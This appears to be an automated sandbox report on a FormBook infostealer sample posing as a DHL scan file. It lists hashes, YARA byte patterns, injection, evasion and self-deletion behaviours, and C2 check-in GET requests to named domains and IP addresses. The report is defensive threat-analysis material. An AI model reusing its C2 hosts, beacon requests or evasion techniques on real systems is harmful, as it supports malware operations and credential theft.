Analysis Report SKM_C36821010708320.exe

Overview

General Information

Sample Name: SKM_C36821010708320.exe
Analysis ID: 339379
MD5: 15d8096422d137c7388908bb2be61ec4
SHA1: e67d261ef38eb251fb97a466d83c95e75d286ebe
SHA256: fae57c2f185899220dff608004ab571822fc14cc02aa7e30b1cd5db7be4beea8
Tags: DHL, exe, Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SKM_C36821010708320.exe (PID: 4740 cmdline: 'C:\Users\user\Desktop\SKM_C36821010708320.exe' MD5: 15D8096422D137C7388908BB2BE61EC4)
    • SKM_C36821010708320.exe (PID: 1928 cmdline: C:\Users\user\Desktop\SKM_C36821010708320.exe MD5: 15D8096422D137C7388908BB2BE61EC4)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 1736 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 4952 cmdline: /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook


Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack | Malware Configuration Extractor: FormBook
Multi AV Scanner detection for submitted file
Source: SKM_C36821010708320.exe | ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: SKM_C36821010708320.exe | Joe Sandbox ML: detected
Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: SKM_C36821010708320.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: SKM_C36821010708320.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msdt.pdbGCTL | source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe, 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe
Source: Binary string: msdt.pdb | source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_060CB410
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 4x nop then pop esi | 2_2_004172D8
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 4x nop then pop esi | 6_2_030172D8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 103.29.215.252:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 103.29.215.252:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 103.29.215.252:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 52.128.23.153:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 52.128.23.153:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 52.128.23.153:80
Source: global traffic | HTTP traffic detected: GET /6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45 HTTP/1.1 | Host: www.o-tanemaki.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /6bu2/?_FNlYB=kQfR6oHqf1829R+dk89CbQkI6JsDf2kbL2dewoZCGSm5OfzNJ+nKnG9aqB78Y+EDmzvg&qRu=rTvtaraPvhs45 HTTP/1.1 | Host: www.idahofallsobituaries.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /6bu2/?_FNlYB=C+zDmV11Q+D9r33XVeqR5IBXFKX0BTJmu/S+z/bMoWLqgljoX+qokl8zdBgJjJlA7MT1&qRu=rTvtaraPvhs45 HTTP/1.1 | Host: www.bhscsh.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45 HTTP/1.1 | Host: www.sheilataman.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45 HTTP/1.1 | Host: www.ehealthla.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 52.128.23.153
Source: Joe Sandbox View | IP Address: 34.102.136.180
Source: Joe Sandbox View | ASN Name: WIIUS
Source: Joe Sandbox View | ASN Name: INTERQGMOInternetIncJP
Source: Joe Sandbox View | ASN Name: DOSARRESTUS
Source: unknown | DNS traffic detected: queries for: www.o-tanemaki.com
Source: explorer.exe, 00000003.00000000.259665559.000000000F540000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_0041A050 NtClose, 2_2_0041A050
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_0041A100 NtAllocateVirtualMemory, 2_2_0041A100
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_00419F20 NtCreateFile, 2_2_00419F20
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_00419FD0 NtReadFile, 2_2_00419FD0
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_0041A0FA NtAllocateVirtualMemory, 2_2_0041A0FA
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009540 NtReadFile, LdrInitializeThunk, 6_2_05009540
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_050095D0 NtClose, LdrInitializeThunk, 6_2_050095D0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009710 NtQueryInformationToken, LdrInitializeThunk, 6_2_05009710
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009780 NtMapViewOfSection, LdrInitializeThunk, 6_2_05009780
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009FE0 NtCreateMutant, LdrInitializeThunk, 6_2_05009FE0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009650 NtQueryValueKey, LdrInitializeThunk, 6_2_05009650
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009660 NtAllocateVirtualMemory, LdrInitializeThunk, 6_2_05009660
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_050096D0 NtCreateKey, LdrInitializeThunk, 6_2_050096D0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_050096E0 NtFreeVirtualMemory, LdrInitializeThunk, 6_2_050096E0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009910 NtAdjustPrivilegesToken, LdrInitializeThunk, 6_2_05009910
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_050099A0 NtCreateSection, LdrInitializeThunk, 6_2_050099A0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009840 NtDelayExecution, LdrInitializeThunk, 6_2_05009840
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009860 NtQuerySystemInformation, LdrInitializeThunk, 6_2_05009860
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009A50 NtCreateFile, LdrInitializeThunk, 6_2_05009A50
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009520 NtWaitForSingleObject, 6_2_05009520
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0500AD30 NtSetContextThread, 6_2_0500AD30
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009560 NtWriteFile, 6_2_05009560
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_050095F0 NtQueryInformationFile, 6_2_050095F0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0500A710 NtOpenProcessToken, 6_2_0500A710
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009730 NtQueryVirtualMemory, 6_2_05009730
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009760 NtOpenProcess, 6_2_05009760
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0500A770 NtOpenThread, 6_2_0500A770
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009770 NtSetInformationFile, 6_2_05009770
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_050097A0 NtUnmapViewOfSection, 6_2_050097A0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009610 NtEnumerateValueKey, 6_2_05009610
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009670 NtQueryInformationProcess, 6_2_05009670
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009950 NtQueueApcThread, 6_2_05009950
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_050099D0 NtCreateProcessEx, 6_2_050099D0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009820 NtEnumerateKey, 6_2_05009820
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0500B040 NtSuspendThread, 6_2_0500B040
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_050098A0 NtWriteVirtualMemory, 6_2_050098A0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_050098F0 NtReadVirtualMemory, 6_2_050098F0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009B00 NtSetValueKey, 6_2_05009B00
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0500A3B0 NtGetContextThread, 6_2_0500A3B0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009A00 NtProtectVirtualMemory, 6_2_05009A00
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009A10 NtQuerySection, 6_2_05009A10
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009A20 NtResumeThread, 6_2_05009A20
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_05009A80 NtOpenDirectoryObject, 6_2_05009A80
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0301A100 NtAllocateVirtualMemory, 6_2_0301A100
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0301A050 NtClose, 6_2_0301A050
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_03019F20 NtCreateFile, 6_2_03019F20
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_03019FD0 NtReadFile, 6_2_03019FD0
Source: C:\Windows\SysWOW64\msdt.exe | Code function: 6_2_0301A0FA NtAllocateVirtualMemory, 6_2_0301A0FA
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 0_2_009D9013, 0_2_009D9013
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 0_2_0524C62C, 0_2_0524C62C
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 0_2_0524E8A0, 0_2_0524E8A0
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 0_2_0524E890, 0_2_0524E890
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 0_2_060C99A0, 0_2_060C99A0
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 0_2_060C0D70, 0_2_060C0D70
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 0_2_060C0D80, 0_2_060C0D80
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 0_2_060C0B18, 0_2_060C0B18
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 0_2_060C0B28, 0_2_060C0B28
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_00401030, 2_2_00401030
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_0041D28D, 2_2_0041D28D
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_0041E407, 2_2_0041E407
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe | Code function: 2_2_0041D53D, 2_2_0041D53D
